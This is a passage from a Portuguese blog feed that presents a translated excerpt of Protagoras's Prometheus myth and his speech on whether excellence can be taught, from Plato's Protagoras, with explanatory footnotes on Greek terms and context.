href=&#34;#fnr.21&#34;21/a/sup p class=&#34;footpara&#34;Para a audiência de Platão, se as histórias contadas por Plutarco (Vida de Péricles 36) já eram conhecidas, essas palavras estariam cheias de ironia dramática. Xanthippus, segundo Plutarco, o filho legítimo mais velho de Péricles, casou-se com uma esposa jovem e gastadora, e se ressentiu amargamente dos modos avarentos de seu pai. Assim, ele pegou emprestado dinheiro de um dos amigos de seu pai, alegando falsamente que estava fazendo isso a pedido de Péricles. Quando Péricles não apenas se recusou a pagar o homem de volta, mas o processou, Xanthippus ficou furioso e começou a denegrir seu pai, acusando-o de indiscrições com a esposa de Xanthippus e afirmando que Péricles desperdiçou seu tempo discutindo com Protágoras sobre se um homem morto por um lançamento acidental de uma lança foi morto pelo lançador ou pela lança. Xanthippus e seu pai nunca reconciliaram sua briga, e Xanthippus morreu na praga pouco antes de seu pai. Plutarco também relata que, quando o único filho sobrevivente de Péricles, Paralus, morreu, Péricles, embora normalmente não chorasse nos funerais de seus parentes mais próximos, durante o funeral de Paralus rompeu em um choro descontrolado pela primeira vez em sua vida. Assim, o Protágoras de Platão termina seu discurso, então, com uma nota de triste ironia./p/div      /div    /div&#xA;Link para comentários.&#xA;&#xA;#Filosofia #Protágoras #Platão #Prometheus #Socrates]]&gt;</description>
      <content:encoded><![CDATA[<p><img src="https://upload.wikimedia.org/wikipedia/commons/0/0e/Prometheus_Adam_Louvre_MR1745_edit_atoma.jpg" alt="Prometheus">
</p>

<p>Dando seguimento ao meu projeto de retomada de Protágoras, com algumas considerações bem <a href="https://infosec.press/sirius/por-que-voltar-a-protagoras" rel="nofollow">informais</a> entendo ser interessante disponibilizar uma boa tradução do mito do mais famoso sofista.</p>

<p>É possível observar uma forte ligação do mito de Prometeu e Epimeteu com as concepções naturalistas da <a href="https://infosec.press/sirius/diodoro-da-sicilia-os-primeiros-homens" rel="nofollow">história dos primeiros homens</a> de Diodoro Sículo, atribuído a Demócrito.</p>

<p>A presente tradução do mito de prometeu foi extraída de outra em inglês, por James A. Arieti e Roger M. Barrus, na obra “Plato&#39;s Protagoras”. Mantive algumas das notas de rodapé do original, que considerei bem interessantes, pouco acrescentei à algumas notas, mas recomendo a leitura do texto original pois há mais notas que tornam a leitura ainda mais interessante.</p>

<p>Nesse diálogo, Sócrates é acordado pelo jovem Hipócrates (filho de Apolodoro) que vem bater à porta de sua casa para avisar que Protágoras está em Atenas, na casa de Hipponicus, filho de Calias.</p>

<p>Ao chegarem na residência, encontram o local repleto de sofistas e discipulos. Sócrates então começa a debater com Protágoras e seu primeiro questionamento é sobre a possibilidade de a excelência (arete) ser ensinada, uma vez que Protágoras era pago como professor de tal matéria.</p>

<p>Protágoras utiliza o mito como uma alegoria para demonstrar que a excelência pode ser ensinada e prossegue discursando sobre outro questionamento de Sócrates sobre bons homens não conseguirem ensinar seus filhos a também serem virtuosos.</p>

<p>Muitas das ideias inovadoras no pensamento político filosófico que estão nessa alegoria, suas ideias humanistas, democráticas, juspositivistas e sociológicas, vou abordar mais detalhadamente em outros escritos.</p>

<p>Segue por enquanto o trecho.</p>

<h2 id="o-mito-de-prometeu">O Mito de Prometeu</h2>

<p>(Protágoras, no diálogo homônimo de Platão)</p>

<p>Era uma vez, como você vê, havia deuses, mas não havia gêneros mortais. [320d] Mas quando também para esses [gêneros] chegou o tempo [que foi] ordenado para [seu] processo de vir a ser, os deuses os moldaram dentro da terra [ao] misturá-los com terra e fogo e todas as coisas misturadas com fogo e terra. E quando os [deuses] estavam prestes a trazer esses [seres] à luz, designaram Prometeu e Epimeteu<sup><a id="fnr.1" class="footref" href="#fn.1" rel="nofollow">1</a></sup> para organizar e distribuir poderes para cada [um dos gêneros mortais] conforme apropriado. E Epimeteu pede a Prometeu [que lhe conceda o favor de] fazer a distribuição. &#39;Mas, [você] supervisionará minha distribuição&#39;, ele disse. E, tendo assim persuadido [Prometeu], ele faz a distribuição. [320e] E ao fazer a distribuição, a alguns ele atribuiu força sem rapidez, mas organizou os mais fracos com rapidez; a outros ele armou, mas ao dar a outros uma natureza desarmada, ele concebeu para eles algum outro poder para sua segurança. Como você vê, para aqueles seres que ele vestiu com pequenez, ele distribuiu uma fuga alada ou o hábito de habitar no subsolo; aqueles que ele aumentou em tamanho, ele salvou por meio desse [tamanho]; [321a] e igualando outras coisas dessa forma, ele continuou a fazer a distribuição. E ele concebeu essas coisas, sendo cauteloso para que nenhum gênero desaparecesse da vista.</p>

<p>E quando ele os havia provido de um meio de escapar de destruições mútuas, ele concebeu um conforto para as estações [que vêm] de Zeus, vestindo-os com espessa pelagem e peles sólidas, suficientes para afastar o inverno e até capazes [de afastar] o calor, e para esses [animais], enquanto vão para suas camas [Epimeteu concebeu] que pudessem possuir seus próprios colchões caseiros, [321b] colocando alguns sob suas armas, mas providenciando a outros peles espessas e sem sangue<sup><a id="fnr.2" class="footref" href="#fn.2" rel="nofollow">2</a></sup>.</p>

<p>Então, ele distribuiu diferentes alimentos para diferentes seres; a alguns [ele deu] erva da terra; a outros, frutas das árvores; a outros, raízes. E há aqueles a quem ele deu a carne de outros animais como alimento. E a alguns ele atribuiu uma baixa taxa de natalidade, mas atribuiu uma alta taxa de natalidade àqueles que eram capturados por eles, proporcionando segurança ao gênero [dos animais consumidos como presa]<sup><a id="fnr.3" class="footref" href="#fn.3" rel="nofollow">3</a></sup>.</p>

<p>E assim, na medida em que não era absolutamente sábio, Epimeteu não percebeu que havia esgotado todos os poderes nos [gêneros] desprovidos de razão [321c] e que a raça humana ainda estava desorganizada por ele, ficando sem saber o que fazer<sup><a id="fnr.4" class="footref" href="#fn.4" rel="nofollow">4</a></sup>. E enquanto estava perplexo, Prometeu se aproxima dele para examinar a distribuição, e vê os outros animais [harmoniosamente] em sintonia em todos [seus recursos], mas o [animal] humano ele vê nu e descalço e sem cama e sem armas. E já havia chegado o dia determinado em que era necessário que a humanidade também [como os outros animais] saísse da terra para a luz. E Prometeu, sem saber que segurança poderia encontrar para o ser humano, rouba de Hefesto e Atena a sabedoria técnica junto com o fogo—[321d] você vê, sem fogo, essa posse [da sabedoria técnica] era para ele sem aplicação prática [ao invés de se tornar uma posse útil]—e assim ele realmente concede um presente à humanidade. E dessa forma, a humanidade tinha sabedoria sobre os meios de subsistência, mas não tinha sabedoria sobre a arte da polis; você vê, [essa sabedoria] estava na casa de Zeus; e não era mais possível para Prometeu ir à acrópole, à casa de Zeus; e além disso, os guardas de Zeus eram temíveis; [321e] e à casa comum de Atena e Hefesto, onde os dois praticavam carinhosamente suas habilidades técnicas, Prometeu vai secretamente e, depois de roubar a habilidade técnica de Hefesto de usar o fogo e outras habilidades técnicas de Atena, ele as dá à humanidade, e por causa disso [os humanos] têm um meio abundante de subsistência; mas depois, como se diz, uma acusação de furto perseguiu Prometeu [322a] por causa de Epimeteu.</p>

<p>E uma vez que o animal humano tinha uma parte do que foi atribuído aos deuses<sup><a id="fnr.5" class="footref" href="#fn.5" rel="nofollow">5</a></sup>, porque (sozinho entre os animais) ele tinha uma afinidade com o divino, primeiro estabeleceu convenções sobre os deuses e se comprometeu a construir altares e imagens dos deuses; segundo, por meio da habilidade técnica, articulou rapidamente a linguagem e os nomes, e descobriu casas, roupas, sapatos, lençóis e os alimentos da terra. Tendo sido assim providos desde o início, de fato, os humanos viveram espalhados, e não havia poleis. [322b] E assim foram destruídos por feras, pois eram mais fracos de todas as maneiras. E embora sua habilidade técnica artesanal fosse uma ajuda suficiente para a alimentação, ela era insuficiente para a guerra com as feras. Veja, eles ainda não tinham uma habilidade técnica de construção política, da qual a habilidade em guerrear é uma parte. Continuavam buscando, de fato, se reunir e se salvar [por meio] da construção de poleis. E assim, quando conseguiam se reunir, agiam injustamente uns com os outros por não possuírem a habilidade técnica no que diz respeito aos assuntos da polis, de modo que, espalhando-se novamente, eram destruídos. [322c] E assim Zeus, temendo por nossa espécie, para que não fosse destruída completamente, envia Hermes para trazer temor reverencial<sup><a id="fnr.6" class="footref" href="#fn.6" rel="nofollow">6</a></sup> e um senso do que é legalmente justo<sup><a id="fnr.7" class="footref" href="#fn.7" rel="nofollow">7</a></sup>, de modo que possam haver tanto princípios de ordenação das poleis quanto os laços que promovem a amizade<sup><a id="fnr.8" class="footref" href="#fn.8" rel="nofollow">8</a></sup>. E assim Hermes pergunta a Zeus de que maneira poderia dar aos humanos um senso do que é legalmente justo e um temor reverencial. “Devo distribuir isso da mesma maneira que as habilidades técnicas foram distribuídas? Elas foram distribuídas assim: uma pessoa que possui habilidade técnica médica é suficiente para muitos leigos, e é o mesmo para os outros artesãos. Devo, de fato, colocar um senso do que é legalmente justo e um temor reverencial nos humanos assim, ou devo distribuí-los a todos?”.</p>

<p>“A todos”, disse Zeus, “e que todos tenham uma parte. [322d] Vocês veem, não haveria pólis se poucos participassem disso, assim como nas outras habilidades técnicas. E considere isso como uma convenção [estabelecida por meu comando] que [é incumbente] matar aquele que não consegue compartilhar do temor reverencial e do senso do que é legalmente justo, [matando-o como] uma praga da pólis”.</p>

<p>Dessa forma, de fato, Sócrates, e por causa dessas coisas, tanto os outros quanto os atenienses, quando há uma discussão sobre a excelência da habilidade técnica de marcenaria ou sobre algum outro ofício, pensam que [apenas] alguns devem ter uma participação no aconselhamento, e se alguém fora desse grupo restrito oferece conselhos, [322e] eles não suportam isso, como você diz—justamente, como eu digo; mas quando vão compartilhar conselhos sobre [a condução] dos assuntos da pólis de forma excelente, [323a] que deve surgir inteiramente de uma prática de justiça<sup><a id="fnr.9" class="footref" href="#fn.9" rel="nofollow">9</a></sup> e autocontrole, eles de maneira apropriada aceitam [o conselho de] cada homem, como é adequado, claro, pois todos têm uma parte nessa excelência, ou não haveria pólis. Isso, Sócrates, é [o que] é responsável por esse [fenômeno].</p>

<p>E assim, para que você não pense que está sendo enganado [ao aceitar] que todos os seres humanos realmente acreditam que cada homem tem uma parte na prática da justiça e nas demais excelências que envolvem os assuntos da pólis, considere a próxima evidência. Nas outras formas de excelência, como você diz, se alguém afirma que é um bom flautista ou [que é bom] em alguma outra habilidade técnica da qual não é [bom], ou eles riem dele ou dificultam [sua vida], [323b] e seus parentes vêm e o avisam de que ele está louco; mas nas [questões de] prática da justiça e nas demais excelências que dizem respeito aos assuntos da pólis, mesmo que saibam que alguém é injusto, se ele mesmo diz a verdade na frente de muitos [pessoas: que ele é injusto]—o que [na questão de outras formas de excelência] eles consideram como autocontrole—ou seja, dizer a verdade, lá eles consideram isso uma loucura, e afirmam que todas as pessoas precisam dizer que são justas, estejam elas sendo ou não, ou que a pessoa que não faz alarde de praticar a justiça está louca<sup><a id="fnr.10" class="footref" href="#fn.10" rel="nofollow">10</a></sup> —como se fosse necessário que qualquer um que não tivesse uma participação na [prática da justiça] [323c] não pertencesse à raça humana.</p>

<p>E assim, isso é o que estou dizendo: que [os cidadãos da pólis] adequadamente aceitam cada homem como conselheiro sobre essa excelência porque pensam que todos têm uma parte nela. E isso tentarei mostrar a você a seguir: Eles não pensam que [essa excelência] é por natureza ou que surge automaticamente, mas [pensam] que é ensinável e que surge da atenção que se dedica a ela. Veja, ninguém fica emocional [323d] em relação aos muitos defeitos que os seres humanos acreditam que uns têm dos outros por natureza ou por acaso, nem dá avisos ou instrui ou disciplina aqueles que têm esses [defeitos] com o objetivo de que não sejam assim, mas sentem pena [por eles]. Pois quem é tão insensato a ponto de se empenhar em fazer qualquer uma dessas coisas em relação àqueles que são feios, pequenos ou fracos? Veja, eu acho que eles sabem que essas coisas—beleza e o oposto, [feiura] —surgem nas pessoas por natureza e por acaso. Mas em relação às muitas coisas boas que pensam surgir para os seres humanos por causa da atenção ou da prática ou do ensino, se alguém não tem essas [323e] mas tem os males opostos a essas, [é em relação] a essas pessoas, suponho, que eles [direcionam] suas emoções e punições e avisos. Entre essas [qualidades ruins], uma é a injustiça e a impiedade e, de maneira geral, tudo que é o oposto da excelência que diz respeito aos assuntos da pólis<sup><a id="fnr.11" class="footref" href="#fn.11" rel="nofollow">11</a></sup>. [324a] É aqui que, de fato, cada pessoa direciona sua emoção e adverte cada [outra pessoa]—claramente porque a posse [da excelência] vem da atenção e do aprendizado. Veja, Sócrates, se você está disposto a voltar sua mente para a disciplina, sobre o que isso pode [fazer] por aqueles que agem injustamente, o [assunto] em si lhe ensinará que os seres humanos pensam que a excelência é algo que pode ser fornecido. Veja, ninguém que tenha uma mente disciplina aqueles que agem injustamente por esse [motivo] e por causa disso—[apenas] porque ele agiu injustamente [324b]—[ou seja,] quem não toma vingança irracionalmente como uma besta; e aquele que se propõe a punir com razão não toma vingança por uma injustiça que foi perpetrada—veja, uma coisa [já] feita não pode [ser feita] não ter acontecido—mas por causa do futuro, para que nem [o perpetrador] novamente atue injustamente, nem outro que o veja punido. E tendo isso em mente, ele tem em mente que a excelência é uma questão de educação: ele pune para o fim de desencorajar. E assim todas as pessoas têm essa opinião, [324c] [ou seja,] todos que tomam vingança privada e publicamente. E o restante da humanidade toma vingança e pune aqueles que pensam que agem injustamente, e não menos os atenienses, seus [colegas] cidadãos; de modo que, de acordo com esse argumento, os atenienses também estão entre aqueles que pensam que a excelência é uma coisa que pode ser fornecida e ensinada. E assim foi suficientemente demonstrado a você, Sócrates, [324d] como, é claro, me parece, que seus cidadãos a aceitam de maneira apropriada quando um ferreiro e um sapateiro dão conselhos sobre assuntos pertinentes à pólis—[porque] pensam que a excelência é uma coisa que pode ser fornecida.</p>

<p>Ainda há o restante da sua perplexidade a respeito dos homens bons—por que, de fato, os homens bons ensinam a seus filhos as outras [lições] dos professores e os tornam sábios [nessas coisas], mas nessa excelência particular [dos seres humanos], os homens bons não tornam [seus filhos] melhores do que ninguém [mais]. Sobre isso, de fato, Sócrates, não contarei mais uma história, mas [apresentarei] um argumento. Veja, considere o seguinte:</p>

<p>Há ou não há uma coisa [324e] que é necessária para que todos os cidadãos compartilhem se houver uma pólis? Nesse ponto, você vê, a mesma perplexidade que o perturba é resolvida, ou não será resolvida em nenhum outro lugar. Veja, se, por um lado<sup><a id="fnr.12" class="footref" href="#fn.12" rel="nofollow">12</a></sup>, existe essa [uma coisa], e essa uma coisa não é a [habilidade] do construtor ou do ferreiro ou do oleiro [325a], mas é a prática da justiça, do autocontrole e da santidade (e estou falando de tudo isso junto como uma só coisa, a excelência de um homem), se há essa [uma coisa] da qual é necessário que todos tenham uma parte (e cada homem, se também deseja aprender ou fazer algo mais, deve agir com essa [uma coisa, a excelência de um homem] e sem isso [ele deve] não [agir])—ou, [se existe essa uma excelência, então é necessário] ensinar e disciplinar aquele que não compartilha disso (uma criança, um homem e uma mulher) até que, sendo disciplinado, [a pessoa] se torne melhor; mas [se acontecer que] mesmo sendo disciplinada e ensinada, a pessoa não obedece [e não se torna melhor], [será necessário] expulsar essa [pessoa], como se incurável, da pólis ou matá-la [325b]—se for dessa forma, e se for naturalmente dessa forma, considere como os homens bons são estranhos, se enquanto ensinam seus filhos outras coisas, não os ensinam isso. Mostramos, você vê, que eles pensam que é uma coisa ensinável tanto privada quanto publicamente. E uma vez que é ensinável e um [assunto] de cuidado, enquanto seus filhos são ensinados as outras coisas para as quais a morte não é a penalidade se não as conhecem, por que a penalidade é a morte e o exílio para seus próprios filhos quando não aprendem e não cuidam da excelência, e [325c] além da morte, a apropriação pública de seus bens e, para ser breve, a completa destruição de seus lares—veja, essas coisas não são ensinadas e não se preocupam [em ensiná-las] com todo o cuidado<sup><a id="fnr.13" class="footref" href="#fn.13" rel="nofollow">13</a></sup>? É, claro, necessário, Sócrates, pensar [assim].</p>

<p>Começando [desde quando] seus filhos são pequenos, durante toda a vida dos [pais], eles ensinam e aconselham [seus filhos]. Assim que um [filho] entende o que é dito mais rapidamente [do que entendia quando era menor], sua ama, mãe, pedagogo<sup><a id="fnr.14" class="footref" href="#fn.14" rel="nofollow">14</a></sup> e [325d] o próprio pai brigam sobre isso—como o filho pode ser melhor—ensinando e mostrando [a ele] que para cada ato e palavra isso é o que é justo, isso é o que é injusto, e isso aqui é o belo, e isso o feio, e isso aqui o sagrado, e isso o profano, e &#39;faça essas coisas&#39;, mas &#39;não faça essas.&#39; E se ele obedece de bom grado . . . mas se não, como se fosse um pedaço de madeira torta ou curvada, eles o endireitam [com] ameaças e golpes. E depois disso, eles o enviam para as [escolas] dos professores e, com muito mais [força], ordenam [aos professores] que se preocupem muito mais com o comportamento ordeiro de seus filhos do que com sua leitura, escrita e sua execução na lira.</p>

<p>[325e] E os professores se preocupam com essas coisas, e assim que os [crianças] aprendem suas letras e estão prestes a entender o que está escrito tão bem quanto já entendiam a fala articulada, os [professores], por sua vez, oferecem-lhes em suas carteiras os poemas de bons poetas para ler e os obrigam a aprendê-los completamente, [poemas] nos quais há muitos avisos e [326a] muitas histórias detalhadas e canções de louvor e encômios aos bons homens do passado, para que a criança, admirando-os, possa imitá-los e esforçar-se para se tornar como eles.</p>

<p>E os professores de lira, por sua vez, em relação a outros assuntos semelhantes, cuidam da [moderação das crianças] para que os jovens não se comportem mal; além desses assuntos, quando as [crianças] aprenderam a tocar lira, eles lhes ensinam também os poemas de outros bons poetas — poetas líricos — ajustando os [poemas] à execução na lira, [326b] e eles fazem com que os ritmos e harmonias se familiarizem nas almas das crianças, para que [as crianças] se tornem mais gentis, [de modo que], ao se tornarem mais rítmicas e harmoniosas, sejam úteis ao falar e agir. Toda a vida de um ser humano, como você vê, precisa de ritmo e harmonia<sup><a id="fnr.15" class="footref" href="#fn.15" rel="nofollow">15</a></sup>.</p>

<p>Então, além dessas coisas, eles ainda enviam [as crianças] ao professor de ginástica para que, estando seus corpos em melhor [condição], possam servir ao bom pensamento<sup><a id="fnr.16" class="footref" href="#fn.16" rel="nofollow">16</a></sup> [326c] e não sejam obrigadas a agir de forma covarde tanto nas guerras quanto em outras ações, por conta da má condição de seus corpos. E aqueles que fazem essas coisas mais são os mais poderosos; e os mais poderosos são os mais ricos; e os filhos desses começam desde a mais tenra idade a ir aos seus professores [e] param [de ir a eles] na idade mais tardia. E quando eles deixam de [ir aos] seus professores, a pólis, por sua vez, os obriga a aprender as convenções e a viver de acordo com elas [326d] como um paradigma, para que não ajam por conta própria ao acaso, mas [os obriga] de uma forma simples: Assim como os professores de escrita riscam o contorno das letras em uma tábua de escrever e dão a tábua àquelas crianças que ainda não são hábeis na escrita e as forçam a [praticar] escrevendo entre as letras delineadas, assim também a pólis, tendo traçado o contorno das convenções — as descobertas dos bons homens do passado que estabeleceram as convenções — obriga [as crianças] a governar e ser governadas de acordo com elas, e aquele que se desvia dessas, [a pólis] castiga. [326e] E o nome para esse castigo entre vocês e em toda parte, já que a pena legal é corretiva, é chamado de &#39;correção&#39;. E assim, já que há tanto cuidado com a excelência, tanto em privado quanto em público, você se admira, Sócrates, e está perplexo sobre se a excelência é ensinável? Mas não é necessário se admirar, seria muito mais [admirável] se ela não fosse ensinável.</p>

<p>E então, por que muitos filhos de bons pais se tornam inconsequentes? Aprenda isso a seguir. Você vê, não é surpreendente se eu estava dizendo a verdade em minhas observações anteriores, que [327a] se houver uma pólis, é necessário que ninguém seja leigo nesse aspecto — a excelência. Você vê, se o que digo é de fato assim — e de todas as coisas isso é o mais verdadeiro — reflita sobre qualquer uma das práticas e coisas a serem aprendidas além da [excelência] e escolha [uma delas]. Se não fosse possível que uma pólis existisse a menos que todos [as pessoas] fossem flautistas — o tipo [de flautista] que cada um poderia ser — cada pessoa [estaria] ensinando cada pessoa [a tocar flauta], tanto privada quanto publicamente, e reprovando qualquer um que não tocasse flauta bem, não se importando [com ninguém] em dar essa [instrução], assim como agora ninguém se importa em [ensinar aos outros] coisas justas e legais e não as esconde como [esconderia] outras questões técnicas; [327b] eu penso, você vê, que a prática da justiça e da excelência [dos indivíduos entre] si nos beneficia<sup><a id="fnr.17" class="footref" href="#fn.17" rel="nofollow">17</a></sup>; por causa dessas coisas, todos falam ansiosamente uns com os outros e ensinam o que é justo e legal; e assim, se compartilhássemos toda nossa empolgação e altruísmo em ensinar uns aos outros a tocar flauta, você acha, Sócrates,” ele disse, “que os filhos de bons flautistas se tornariam bons flautistas mais do que [os filhos de] flautistas inconsequentes? Eu acho que não, mas qualquer filho, tendo nascido excelente por natureza em música de flauta, poderia se tornar grande e famoso, e qualquer filho que [327c] não tivesse [excelência] natural ficaria sem fama. E muitas vezes [o filho] de um bom flautista acabaria sendo um flautista inconsequente e o [filho de um flautista inconsequente acabaria sendo] um bom. Mas, de qualquer forma, na verdade, todos [esses] flautistas seriam adequados em comparação a leigos que não sabem nada sobre flauta. E dessa forma, pense mesmo agora que qualquer um criado entre convenções e seres humanos que lhe parece ser um ser humano muito injusto [327d] é [no entanto] justo, mesmo um artesão disso, se ele tiver que ser julgado em comparação com seres humanos que não têm educação nem tribunais nem convenções nem qualquer necessidade que continuamente obrigue alguém a cuidar da excelência, mas são selvagens — o tipo [de pessoas] que o poeta Pherecrates colocou no palco no ano passado no [festival] Lenaian<sup><a id="fnr.18" class="footref" href="#fn.18" rel="nofollow">18</a></sup>.</p>

<p>[Se você se encontrasse] entre tais seres humanos, como os que odeiam os homens em seu coro, você ficaria extremamente feliz se encontrasse Eurybates e Phrynondas<sup><a id="fnr.19" class="footref" href="#fn.19" rel="nofollow">19</a></sup>, [327e] e você choraria alto, desejando a maldade das pessoas aqui. E agora você está amoado, Sócrates, porque todos são professores de excelência, cada um na medida em que pode ser, e ninguém lhe parece ser [um professor disso]; é como isto: Se você estivesse procurando alguém para ser um professor de grego, [328a] ninguém apareceria, nem, de fato, eu penso, se você estivesse buscando alguém para ensinar os filhos dos artesãos a mesma habilidade técnica que, de fato, eles aprenderam com seus pais, na medida em que seu pai e os amigos de seu pai que tinham a mesma habilidade ainda pudessem ensinar [a eles], eu não acho que seria fácil, Sócrates, encontrar um professor dessas [artes], mas para [jovens que eram] totalmente inexperientes, seria fácil [encontrar um professor], e é assim também nas [questões] de excelência e de todas as outras coisas. [328b] Mas se alguém diferir de nós um pouco ao nos levar adiante para a excelência, é algo a ser celebrado. Eu acho que sou um desses e [que eu] beneficio uma pessoa de forma diferente das outras em se tornar um homem bom e digno, e merecidamente faço isso por um pagamento e por um pagamento ainda maior, como parece [certo] para o próprio aprendiz. Por causa dessas coisas, também fiz isso em relação ao pagamento. Você vê, sempre que alguém aprende comigo, se desejar, [ele paga] o valor que eu cobro, mas se ele não [quiser], ele vai a um templo e jura [328c] quanto ele acha que minhas aulas valem, [e] é isso que ele coloca<sup><a id="fnr.20" class="footref" href="#fn.20" rel="nofollow">20</a></sup>.</p>

<p>Para você, Sócrates,” ele disse, “esta é a história e o argumento que eu contei, sobre como a excelência é um [assunto] ensinável e como os atenienses pensam isso e como não é de modo algum surpreendente que os filhos de homens bons se tornem inconsequentes e os filhos de [pais] inconsequentes se tornem bons, uma vez que os filhos de Policleto, que têm a mesma idade que Paralus e Xanthippus aqui, não são nada comparados ao pai deles, e outros [filhos] de outros artesãos são iguais. Mas não é correto acusar esses [rapazes]<sup><a id="fnr.21" class="footref" href="#fn.21" rel="nofollow">21</a></sup>. [328d] Você vê, ainda há esperanças neles; você vê, eles são jovens.</p>

<p><div id="footnotes">        <h3 class="footnotes">Notas de Rodapé</h3>        <div id="text-footnotes">            <div class="footdef"><sup><a id="fn.1" class="footnum" href="#fnr.1" rel="nofollow">1</a></sup> <p class="footpara">Os nomes são significativos: Prometeu significa “compreensão antecipada”; Epimeteu significa “compreensão tardia”.</p></div>            <div class="footdef"><sup><a id="fn.2" class="footnum" href="#fnr.2" rel="nofollow">2</a></sup> <p class="footpara">Toda esta frase é obscura. Talvez Protágoras esteja falando sobre as camas ou os locais de dormir dos animais que não têm “um colchão de pelagem.” Aqueles que se escondem sob suas armas seriam animais como os porcos-espinhos, que dormem sob seus espinhos; aqueles que são providos de pele espessa seriam animais como elefantes ou vacas; aqueles que são dotados de partes sem sangue seriam animais como caracóis ou tartarugas. Uma tradução alternativa poderia ser “vestindo alguns com armas, outros com peles espessas e sem sangue.” Esses seriam animais que usam seus pés como armas e como meio de locomoção. Talvez, neste caso, as peles espessas e sem sangue se refiram a cascos.</p></div>  <div class="footdef"><sup><a id="fn.3" class="footnum" href="#fnr.3" rel="nofollow">3</a></sup> <p class="footpara">Heródoto faz praticamente a mesma observação (3.108).</p></div>    <div class="footdef"><sup><a id="fn.4" class="footnum" href="#fnr.4" rel="nofollow">4</a></sup> <p class="footpara">Ficar sem saber o que fazer se refere aqui ao estado de aporia.</p></div>  <div class="footdef"><sup><a id="fn.5" class="footnum" href="#fnr.5" rel="nofollow">5</a></sup> <p class="footpara">Isso provavelmente se refere à capacidade de raciocinar.</p></div> <div class="footdef"><sup><a id="fn.6" class="footnum" href="#fnr.6" rel="nofollow">6</a></sup> <p class="footpara">Aidós (Αἰδώς): reverência, temor, respeito pelo sentimento ou opinião dos outros ou pela própria consciência, vergonha, autorrespeito, senso de honra, sobriedade, consideração pelos outros, especialmente os desamparados, compaixão. Na mitologia grega, Aedos ou Aesquine era uma Daemon, a personificação da vergonha, da humildade e do pudor, sendo ao mesmo tempo a divindade que representava o sentimento da dignidade humana, tendo como qualidade o respeito ou a vergonha que reprime aos homens do inapropriado. Sua equivalente romana seria Pudor ou Pudicia. Traduzido como “temor reverencial” pois no texto está em algum lugar entre “reverência”, que parece inspirada pela bondade, e “medo”, que é uma expectativa de dano.</p></div>   <div class="footdef"><sup><a id="fn.7" class="footnum" href="#fnr.7" rel="nofollow">7</a></sup> <p class="footpara">Dike (δίκη): Um termo do direito ático que significa, de forma geral, qualquer procedimento legal de uma parte diretamente ou indiretamente contra outras. O objetivo de todas essas ações é proteger o corpo político, ou um ou mais de seus membros individuais, de lesões e agressões. Esta é a nossa tradução de dike, que, embora às vezes seja traduzida como “justiça”, de forma mais geral significa “processo judicial”, “ação legal” e até mesmo “pena atribuída”, e, portanto, tem uma associação com um processo ou sensibilidade legal. É análoga ao nosso termo “temor reverencial” e combina um senso do que é certo com um medo de sofrer uma penalidade.</p></div>    <div class="footdef"><sup><a id="fn.8" class="footnum" href="#fnr.8" rel="nofollow">8</a></sup> <p class="footpara">Talvez na frase de Protágoras tenhamos uma lista dos componentes do artesanato político. A ordem e a amizade são as bases da vida social. Essas opiniões são muito antigas. Em Heródoto, Deioces é o fundador da realeza porque mantém sua sociedade, a Média, longe da anarquia. Os antigos argumentos sobre o fortalecimento da cidade incluem o aumento do número de laços (desmoi) entre os indivíduos. O principal argumento moral contra o casamento incestuoso é que ele duplica os laços (o mesmo homem pode ser irmão, tio, primo) em vez de multiplicar os laços entre famílias distintas por meio de casamentos fora da própria família (criando parentes por meio do casamento).</p></div> <div class="footdef"><sup><a id="fn.9" class="footnum" href="#fnr.9" rel="nofollow">9</a></sup> <p class="footpara">Anteriormente, Protágoras havia associado os termos &#39;senso do que é legalmente justo&#39; com &#39;temor reverencial.&#39; Agora, em vez de &#39;senso do que é legal,&#39; ele está usando dikaiosyne, que traduzimos como &#39;prática de justiça,&#39; embora ela, assim como dike (veja a nota 7), também seja frequentemente traduzida simplesmente como &#39;justiça&#39;.</p></div> <div class="footdef"><sup><a id="fn.10" class="footnum" href="#fnr.10" rel="nofollow">10</a></sup> <p class="footpara">Esta é uma visão completamente oposta àquela que Sócrates defende no Górgias, onde ele persuade seu interlocutor Pólis de que um homem deve se denunciar e denunciar seus amigos quando eles estiverem errados e deixar seus inimigos em liberdade (Górgias 480b–481b).</p></div>  <div class="footdef"><sup><a id="fn.11" class="footnum" href="#fnr.11" rel="nofollow">11</a></sup> <p class="footpara">Injustiça e impiedade e, de maneira geral, tudo que é o oposto da excelência que diz respeito aos assuntos da pólis&#39; são entendidos como uma só coisa. Um hendíadis é o recurso pelo qual uma coisa é expressa por duas palavras (por exemplo, &#39;força e vigor&#39;). Há um debate sobre se uma ideia ou várias ideias distintas são pretendidas aqui. Em Platão, há a questão recorrente de se a virtude é uma coisa só e se todas as aparentemente várias virtudes se reduzem a uma única virtude. A linguagem que Platão aqui dá a seu personagem Protágoras parece deliberadamente provocativa, já que Protágoras diz que uma das qualidades ruins consiste em partes, uma delas extremamente grande (&#39;de maneira geral, tudo que é o oposto da excelência que diz respeito aos assuntos da pólis&#39;).</p></div>  <div class="footdef"><sup><a id="fn.12" class="footnum" href="#fnr.12" rel="nofollow">12</a></sup> <p class="footpara">Platão faz com que Protágoras se esqueça do pensamento que começaria com &#39;por outro lado.&#39; Protágoras nunca retoma as consequências de não haver uma excelência humana básica e se perde em um argumento divagante.</p></div>  <div class="footdef"><sup><a id="fn.13" class="footnum" href="#fnr.13" rel="nofollow">13</a></sup> <p class="footpara">Protágoras está fazendo um argumento a fortiori, argumentando &#39;a partir do que é mais forte.&#39; Por exemplo, se uma pessoa pode levantar cinquenta libras (o que requer maior força), ela certamente pode levantar dez libras. Sem dúvida, este é um dos tipos de argumento que Protágoras ensinou.</p></div>    <div class="footdef"><sup><a id="fn.14" class="footnum" href="#fnr.14" rel="nofollow">14</a></sup> <p class="footpara">Um pedagogo era o escravo que acompanhava um menino à escola e de volta para casa.</p></div>   <div class="footdef"><sup><a id="fn.15" class="footnum" href="#fnr.15" rel="nofollow">15</a></sup> <p class="footpara">Na República, Sócrates discute extensivamente o papel da música na educação dos guardiões. A música, segundo Sócrates, tem o poder de agir diretamente sobre as paixões, até contra e sem a razão. O uso da música, juntamente com a ginástica, serve para refinar a alma adequadamente — tornar a alma mais dura ou mais suave conforme necessário — para preparar os guardiões para o cumprimento de sua responsabilidade política (liderar sua sociedade em tempos de paz e guerra) e, ainda mais, para o cumprimento de sua responsabilidade intelectual (buscar a verdade do ser). Veja, por exemplo, República 410a–412a.</p></div>  <div class="footdef"><sup><a id="fn.16" class="footnum" href="#fnr.16" rel="nofollow">16</a></sup> <p class="footpara">Protágoras parece aqui antecipar o argumento de que corpos saudáveis podem ser usados para o bem ou para o mal. No 